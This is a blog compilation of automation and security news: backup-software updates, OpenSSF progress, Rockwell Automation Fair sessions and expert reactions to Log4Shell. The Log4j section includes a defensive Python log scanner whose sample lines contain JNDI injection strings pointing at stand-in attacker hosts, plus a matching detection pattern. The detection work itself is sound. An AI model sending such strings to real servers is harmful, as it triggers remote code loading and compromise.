StorCentric’s Retrospect Adds Anomaly Detection to Ransomware Protection

I used to use Retrospect to back up files on my Macs. Not sure why I stopped, probably a compatibility issue with MacOS at the time. It did the job for me, though. But I was surprised to get some news from StorCentric, the company behind Retrospect, announcing an update. Something I’ll have to check out again.

Retrospect, a StorCentric company, announced the general availability (GA) of Retrospect Backup 18.5, featuring new anomaly detection, customizable filtering and thresholds, and enhanced ransomware protection to help businesses quickly detect and defend against malicious attacks. With deeper Microsoft Azure Blob integration for Immutable Backups and integrated cloud bucket creation, Retrospect Backup 18.5’s anomaly detection and ransomware protection bolster StorCentric’s data-centric security approach to organizations’ critical infrastructure.

According to Coveware, most corporate targets are small and medium businesses. 72% of targeted businesses have fewer than 1,000 employees, and 37% have fewer than 100. Businesses are projected to have paid out $20B in 2021, a 100% Y-o-Y increase for the last four years, and it’s only going to get worse with new business models like RaaS: ransomware-as-a-service. With Retrospect Backup 18, businesses can protect their infrastructure with immutable backups for ransomware protection.

Included in Retrospect Backup 18.5

▪ Anomaly Detection: Detect anomalies in systems based on customizable filters and thresholds tailored to individual environments.

▪ Retrospect Management Console Integration: View anomalies across a business or partner’s entire client base in a single pane of glass.

▪ Improved Microsoft Azure Blob Integration: Set individual immutable retention policies for different backup sets within the same Azure Storage Container.

▪ Streamlined Immutable Backup User Experience: Automatically create cloud buckets with immutable backups supported by default.

▪ LTO-9 Support: Includes support for LTO-9, with capacities up to 18TB (45TB compressed).

Open Source Security Foundation Reveals Progress

News coming my way over the past couple of years has changed. There is very little from automation, control, instrumentation, and even networking. Two consistent visitors to my inbox are combined in this news from the Linux Foundation—Open Source and Security. This news touts the growth of the Open Source Security Foundation.

The Open Source Security Foundation (OpenSSF), a cross-industry organization hosted at the Linux Foundation that brings together the world’s most important open source security initiatives, announced that 19 new organizations have joined OpenSSF to help identify and fix security vulnerabilities in open source software and to develop improved tooling, training, research, best practices, and vulnerability disclosure practices. It also announced the latest milestones achieved across a variety of its technical initiatives, all of which underscore the cross-industry momentum resulting from increased awareness in the wake of recent security incidents, the White House Open Source Security Summit, and recent Congressional hearings.

“The time is clearly now for this community to make real progress on software security. Since open source is the foundation on which all software is built, the work we do at OpenSSF with contributions from companies and individuals from around the world is fundamental to that progress,” said Brian Behlendorf, executive director at OpenSSF. “We’ve never had more support or focus on building, sustaining and securing the software that underpins all of our lives, and we’re happy to be the neutral forum where this can happen.” 

New Premier Member commitments come from 1Password, Citi, Coinbase, Huawei Technologies, JFrog and Wipro. New General Member commitments come from Accuknox, Alibaba Cloud, Block, Inc., Blockchain Technology Partners, Catena Cyber, Chainguard, DeployHub, Gravitational Inc., MongoDB, NCC Group, ReversingLabs, Spotify and Wingtecher Technology. New Associate Members include Institute of Software, Chinese Academy of Science (ISCAS), MITRE and OpenUK. The complete OpenSSF member roster is available online.

These commitments come on the heels of the recent White House Open Source Security Summit, where the Linux Foundation and OpenSSF represented hundreds of their project communities and discussed how best to support software security and open source security posture going forward. The summit marked a major milestone in the Linux Foundation’s engagement with the public sector and underscores its position to support not only the projects it hosts but all of the world’s most critical open source infrastructure.

Following are examples of community work.

OpenSSF also recently announced the Alpha-Omega Project to improve the security posture of open source software (OSS) through direct engagement of software security experts and automated security testing. It is initially supported by Microsoft and Google with a combined investment of $5 million. The Project improves global OSS supply chain security by working with project maintainers to systematically look for new, as-yet-undiscovered vulnerabilities in open source code, and get them fixed. “Alpha” will work with the maintainers of the most critical open source projects to help them identify and fix security vulnerabilities, and improve their security posture. “Omega” will identify at least 10,000 widely deployed OSS projects where it can apply automated security analysis, scoring, and remediation guidance to their open source maintainer communities.

Scorecards is an OpenSSF project that helps open source users understand the risks of the dependencies they consume. OpenSSF members GitHub and Google recently announced Scorecards v4, which includes the Scorecards GitHub Workflow Action to automatically identify how changes to a project affect its security. It also includes a License check to detect the presence of a project license and a Dangerous-Workflow check to detect dangerous usage of the pull_request_target trigger and the risk of script injection in GitHub workflows. The Scorecards project has also increased the scale of its scans from 50,000 projects to one million projects identified as most critical based on their number of direct dependencies, giving a more detailed view of the ecosystem and strengthening supply chain security as users see improved coverage of their dependencies.

Software Update to Open Secure Process Systems

Bedrock Automation Founder, CEO and CTO Albert Rooyakkers and I have had several energetic discussions regarding the open, secure, and automation pillars of the Bedrock Automation control solution. I always ask founders and CEOs in this market how they think they can possibly upend the leaders. In this case, independent observers tell me that Bedrock has found a niche within certain industry segments that require its specific benefits.

This news release points to a recent software upgrade making it easier to configure and run open applications inside the “Open Secure Automation” (OSA) controllers, simplify and improve SCADA redundancy, enable TLS support for MQTT Sparkplug, expand universal EtherNet/IP capacity, simplify flow meter proving, and assist in diagnosing large motors.

A quick aside—Sparkplug is an open information model standard developed by MQTT evangelists that I would label as “OPC UA lite”. Check out Cirrus Link for better and more detailed descriptions.

The new firmware affects the Bedrock OSA control system, the OSA Remote control system, Universal Ethernet module (UE5), and the OSA Remote +Flow measurement and control system.

The new Bedrock firmware enhancements move redundancy management from the SCADA system client to the Bedrock controller firmware. This enables seamless and flawless failover while simplifying SCADA configuration. The SCADA software then needs to point to only one IP address and the Bedrock controllers will find the active path automatically.

This software release improves throughput and diagnostics for the Bedrock Ethernet gateway modules. It includes both status and diagnostic information from EtherNet/IP and Modbus TCP devices connected to a Bedrock Universal Ethernet I/O module (UE5).

New control firmware in the Bedrock OSA Remote supports the J1939 and CANopen CAN bus communication standards, which extends open secure automation for control and factory automation. Using J1939 CAN bus, for example, the Bedrock OSA Remote can be configured as an RTU to read RPMs from large motors to diagnose performance.

The Bedrock OSA Remote +Flow computer application now supports K-Factor and meter factor linearization with user-entered linearization curves. The OSA +Flow now also supports double chronometry for select high speed counter channels. The OSA +Flow application takes advantage of this new feature to support meter proving using displacement provers, including small volume provers.

All software will be standard on all relevant systems immediately. All current Bedrock OSA users can upgrade remotely at no charge.

StorCentric Announces Nexsan Unity Software For Data and Security

The types of products and services covered here keep expanding as technology and application requirements change. It’s the new year, prompting reflection on the past and the future. I just happened upon a LinkedIn conversation about an article in Automation World about PAC versus PLC. That seems so 20 years ago. Yet, the discussion in Germany involves PC-based control versus PLCs. Meanwhile, I’m looking at all the data technologies required for the efficient operation of a plant or factory. This news involves the hot topics of data and security.

And I won’t be ignoring the Consumer Electronics Show starting today in Las Vegas. Several companies have pulled out of the live experience, but I’ve begun getting CES news. I never go to that show, but I’ve been to two and survived. We’ll see how that one works out. It’s amazing the technologies we’ll see at CES that will be industrial before you know it.

StorCentric, provider of a comprehensive portfolio of secure data management solutions, today announced Nexsan Unity software version 7.0, which includes important enhancements to power enterprise-class security, compliance and ransomware protection. The new Unity software now supports Object (S3) protocol, and data-centric security features such as immutable snapshots and object locking. This release also offers up to a 40% performance increase over Nexsan Unity version 6.1.

This massive growth in data combined with significant changes in the way we work today and a rapid rise in cybercrime has driven increased demands and challenges for enterprise data center managers. The new Unity software enhancements are designed to address these issues and redefine how StorCentric channel partners and customers store, manage and protect data at scale.

Available in Nexsan Unity v7.0:

Protocol Support

– Object (S3) Protocol – Unity is now a true unified solution, supporting Block (iSCSI, FC), File (NFS, CIFS/SMB) and now Object (S3) protocols.

Security, Compliance and Ransomware Protection

– Immutable Snapshots – Unity now supports immutable volume and file system snapshots for data protection. This provides secure point-in-time copies of data for business continuity.

– Object Locking – Unity now supports object locking, enabling bucket or object-level protection for a specified retention period to create immutable copies of data. This allows enterprises to address compliance, regulatory and other data protection requirements.

– Data Integrity – Unity supports pool-scrubbing to detect and remediate bit rot to avoid data corruption.

Performance Improvements

– Total Throughput has increased up to 13GB/s on the existing platforms.

– Up to 50% increase in Unity to Assureon Ingest Rate – Significantly improves the efficiency of the Unbreakable Backup solution.

Rockwell Automation News and Updates

The first business trip involving airplane and car in 18 months took me to Houston in November to Automation Fair, the Rockwell Automation user conference and trade show. They offered five press conferences via remote conferencing. I felt the urge to visit with people in person. Several thousand visitors wandered the show floor along with me. And I sat in the press conferences in person with a couple of editors from Control, a couple of analysts from ARC Advisory Group, an editor I didn’t know for one session, and an editor from Automation World for one other session. It felt good to be back, but this was hardly like old times. I was not rushed from appointment to appointment—I had no appointments.

The content was not like old times. No motor control or programmable controllers, although I did look up a PLC product person on the show floor to dive into a couple of things. The press conferences were somewhat IT oriented with cybersecurity and cloud, workforce issues around culture and diversity, and sustainability. Following are summaries of the press conferences and of three news items released at the show.

Cybersecurity Steps Needed for 2022

No discussion of industrial technology can begin without considering cybersecurity. Angela Rapko (Regional Vice President, Lifecycle Services, Rockwell Automation), Shoshana Wodzisz (Manager, Product Security, Rockwell Automation), and Theodore Haschke (Manager, Business Development, Functional Safety & Cybersecurity, TUV Rheinland) talked standards with us. High-profile cyber and ransomware attacks rocked the manufacturing industry in 2021 and raised government attention to the need for stronger oversight to protect businesses worldwide. Global cybersecurity standards have been established based on guidance from industry leaders for both the IT and OT levels, but adoption still lags. The session covered how businesses can use those standards to improve security in 2022, and why OT can’t be left behind when updating best practices.

Leveraging Culture and DEI as a Competitive Advantage

Bobby Griffin (Chief Diversity, Equity & Inclusion Officer, Rockwell Automation) and Becky House (Senior Vice President & Chief People & Legal Officer, Rockwell Automation) discussed how many companies have put a more intentional focus on company culture and DEI – but how do you know you’re having the right impact? Diversity, equity, and inclusion are core principles at Rockwell. There is a KPI associated with it, and managers’ compensation is tied to it. Among other things, check out the senior leadership page on the Rockwell website. There are women on it. And a couple of other faces that are not old white men. There is a refreshing mix of ages, genders, and ethnicities.

Why Cloud? Why Now? Three Factors Driving Adoption of SAAS-Based Solutions

I could understand the discussion of cybersecurity, which can be expected given the several-year-old vision of Rockwell regarding the Connected Enterprise. The discussion of computing in the cloud would never have happened with a straight face even three years ago. Maybe two. Let us consider two very recent acquisitions of cloud-based companies—Plex and Fiix. Brian Shepherd (Senior Vice President, Software & Control, Rockwell Automation), James Novak (Chief Executive Officer, Fiix), and Bill Berutti (Chief Executive Officer, Plex) joined us for a discussion of the companies, products, and benefits of cloud. Yet another sign of a rapidly changing Rockwell Automation.

Using Data to Drive Productivity and Sustainability

Rockwell Automation has had sustainability goals and solutions for many years. This topic remains a key focus for the corporation. Tom O’Reilly (Vice President, Sustainability, Rockwell Automation) and Arvind Rao (Director, Product Management & Head of Industry Solutions, Rockwell Automation) met with us to discuss how “customers and investors are demanding that we do business in ways that are more productive and more sustainable.” Operational data and analytics can reduce waste, improve quality, and reduce energy, all while driving increased productivity and delivering results against sustainability initiatives.

Three Strategies for Creating an Agile and Flexible Workforce

Rachael Conrad (Vice President & General Manager, Customer Support & Maintenance, Rockwell Automation) and Sherman Joshua (Director, Workforce & Competency, Lifecycle Services, Rockwell Automation) revealed Rockwell’s key strategies for creating an agile and flexible workforce post-pandemic and how manufacturers can leverage their workforce as their greatest asset.

New Initiatives to Bolster Cybersecurity Offering for Customers

Rockwell Automation, Inc. announced new investments to enhance its information technology (IT) and operational technology (OT) cybersecurity offering. These initiatives include strategic partnerships with Dragos, Inc. and CrowdStrike, as well as the establishment of a new Cybersecurity Operations Center in Israel.

Rockwell and Dragos, a global leader in cybersecurity for industrial control systems (ICS)/OT environments, have announced a partnership that combines Rockwell’s global industry, application, and ICS domain expertise with Dragos’s world-class technology, professional services, and threat intelligence services. The partnership will focus on incident response services and threat intelligence.

Rockwell and CrowdStrike, a leader in cloud-delivered endpoint and workload protection, have formed a partnership to deliver end-to-end cybersecurity and network service solutions to customers. The partnership will examine initiatives for CrowdStrike’s cloud-native, AI-powered Falcon platform with Rockwell’s global deployment, network architecture, support, OT, and managed services capabilities to deliver differentiated solutions that address customer cybersecurity pain points.

Rockwell Automation Expands Supply Chain Services with Acquisition of AVATA

Rockwell Automation, Inc. has acquired AVATA, a leading services provider for supply chain management, enterprise resource planning, and enterprise performance management solutions. AVATA has significant domain expertise in enterprise applications and is a leading consultant and systems integrator for Oracle cloud software applications.

By significantly improving end-to-end supply chain visibility and management, AVATA, together with Kalypso, Rockwell’s industrial digital transformation services business, will help further unlock the value of information technology/operational technology (IT/OT) convergence that Rockwell can deliver to customers. AVATA will be integrated into Kalypso, which is a part of Rockwell’s Lifecycle Services business.

AVATA supports Rockwell’s recent cloud-native investments, building on its open architecture to extend the digital thread and enable powerful integrations with other leading technologies, now including Plex and Oracle Cloud.

Rockwell Automation and Battery Pioneer Cadenza Innovation to Explore Driving Energy Storage and Advance Sustainability

Rockwell Automation has begun collaborating with Cadenza Innovation, the award-winning provider of safe, low cost, and energy-dense Lithium-ion-based storage solutions, to define a strategic relationship including a shared goal of building the industry’s highest performance battery cell production lines.

During 2022 the companies intend to collaborate to develop a customer cloud portal to manage deployed distributed energy resources, an end-to-end battery manufacturing execution system (MES), and equipment automation to support the expansion of Cadenza Innovation’s battery manufacturing in the US and abroad.

Rockwell Automation and Cadenza Innovation intend to create a full digital thread that feeds information from business systems to the factory floor and subsequently out to the field-deployed energy storage systems to ‘close the loop’ by feeding data from the field back into Cadenza Innovation’s connected operations. This, in turn, will ensure peak performance of customer systems.

Thoughts On Apache Security Exploit

One of the more difficult things I do concerns filtering press releases to figure out which are hype and which have some enduring relevance. The first one I received about the Log4J exploit seemed over the top. However, this one appears to have legs. Best practices tell us to take action and be concerned. Following are a number of statements from security leaders. Take note of these.

This from my host platform, Cloudflare, “Last Friday we sent you an email about a zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228). We advised you that Cloudflare had immediately updated our WAF to help protect you against this vulnerability. We also recommended that all organizations that use Log4j immediately update to the newest version to mitigate exploit attacks. The latest version can be found at the Log4j download page.”

Glen Pendley, Deputy CTO at Tenable, “Log4Shell, a critical vulnerability in Apache Log4j, shines a bright light on the risky practice of relying on open-source code libraries to build enterprise-scale applications. Many organizations around the world rely on open-source libraries as a key element in their ability to bring applications to market quickly. Yet, these libraries often stop short of a security-first approach. This dependence on what is effectively a wild, wild west of code libraries will continue to leave organizations vulnerable until time and resources are invested to make them more secure.”

And from Paul Laudanski, Head of Threat Intelligence at Tessian, “The log4j vulnerability has created endless golden opportunities for bad actors – and they know it and are getting creative. What they’re trying to do now is build an arsenal of tools that they can use across the globe for theft and service disruption, especially ahead of the holiday season. DDoS attacks in particular are a top concern, as exploitation could allow bad actors to download, install and then fully control an army of botnets. DDoS operators can then focus on attacks that bring down critical infrastructure – ranging from utilities to power grid – and especially retailers ahead of the holiday season, a time when people are notoriously distracted, tired and more prone to making security mistakes. Couple that with an increase in moratoriums, when no code is released into production, so emergency patches would require a break of that moratorium.

Meanwhile, there’s also the concern that the original CVE will end up generating subsequent CVEs, potentially exponentially multiplying its impact, similarly to the follow-on bugs we saw after SolarWinds. Luckily, log4j only has one in 2021 so far, but I wouldn’t be surprised if other related flaws are found soon. However, it’s worth noting one silver lining: white hats are working tirelessly to train folks on how to identify the vulnerability, so most teams will now be properly educated and informed on the growing threat.”

From the blog of Nozomi Networks, “At the end of last week (Friday, December 10), the cybersecurity world became aware of a new zero-day vulnerability in the Apache Log4j logging utility that has been allowing easy-to-exploit remote code execution (RCE). Coupled with the popularity of this tool, multiple companies and commercial applications have become affected by it. It received a codename Log4Shell. In addition to promptly deploying several protection mechanisms for our customers, Nozomi Networks set up a honeypot to monitor the situation and became aware of all potential global scans and exploitation attempts.”

“Apache quickly categorized the vulnerability as critical due to the simplicity of the attack and the number of susceptible platforms and systems. All an attacker has to do is send a malicious string that would be logged by the server. Minecraft users were exploiting servers using the chat function, and Twitter users could trigger the exploit by changing their display names, as could iPhone users by changing their phone name. In this post, we provide some technical details related to how malware authors immediately started taking advantage of this vulnerability.”
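The quoted description above boils down to one fact a defender can act on: the attack string has to be logged, so it is usually sitting in the server’s own access logs. The following is an added example, not code from Nozomi Networks, Cloudflare or this blog, that triages a batch of constructed web-server log lines for JNDI lookup strings (the CVE-2021-44228 pattern), URL-decoding each line first because the string often arrives percent-encoded in a request path, and reports the scheme and host so an incident responder has something to pivot on.

```python
"""Triage web-server log lines for Log4Shell (CVE-2021-44228) lookup strings.

Added defensive example; the log lines below are constructed, and the host
names use reserved example ranges (attacker.example, 203.0.113.0/24).
"""
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import unquote

# Log4j 2 expands "${jndi:<scheme>://<host>...}" found in logged data, so any
# logged value containing that lookup is worth a closer look. Whitespace is
# tolerated and matching is case-insensitive; the host group stops before a
# port, path or closing brace.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z0-9]+)\s*:\s*//\s*(?P<host>[^/\s}:]+)",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based line number in the scanned batch
    scheme: str    # e.g. "ldap" or "rmi"
    host: str      # host the lookup points at
    raw: str       # the matched fragment, for the incident record


def decode_line(line: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), since paths may be double-encoded."""
    for _ in range(rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def scan_lines(lines: List[str]) -> List[Finding]:
    """Return one Finding per JNDI lookup seen in the (decoded) log lines."""
    findings = []
    for n, line in enumerate(lines, start=1):
        for m in JNDI_RE.finditer(decode_line(line)):
            findings.append(Finding(n, m["scheme"].lower(), m["host"], m.group(0)))
    return findings


def hosts_for_triage(findings: List[Finding]) -> List[str]:
    """Distinct, sorted hosts referenced by the lookups (for IR pivoting)."""
    return sorted({f.host for f in findings})


# Constructed sample access log: one benign line, one lookup in the User-Agent,
# one percent-encoded lookup in the query string, one harmless "${...}" value.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:21:14:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:21:14:07 +0000] "GET /login HTTP/1.1" 404 0 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:21:14:09 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%3A1099%2Fobj HTTP/1.1" 200 17 "-" "curl/7.79"',
    '10.0.0.5 - - [10/Dec/2021:21:14:11 +0000] "GET /docs?tpl=${user.name} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.scheme} lookup -> {f.host}  ({f.raw})")
    print("hosts to triage:", hosts_for_triage(scan_lines(SAMPLE_LOG)))
```

Running it over the sample flags lines 2 and 3 only; the `${user.name}` value on line 4 is not a JNDI lookup and is correctly ignored.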

Further from Amit Yoran, Chairman and CEO, Tenable, “Just as we warned, Log4Shell is unleashing holy hell on businesses everywhere. And the worst is yet to come if organizations don’t take immediate action.

Researchers are already observing ransomware activities as cybercriminals begin utilizing Log4Shell in their playbooks. Let me be clear, these ransomware activities are not going to go away – they will only increase like wildfire thanks in part to this new, perfect payload in the form of Log4Shell. Organizations need to take swift and decisive action as Log4Shell can and will completely undermine your security program.

No vendor’s product is a silver bullet to solve this problem. Eliminating the threat posed by Log4Shell requires hard work and time to understand this vulnerability and how it will morph and evolve over time to bypass protective measures.”
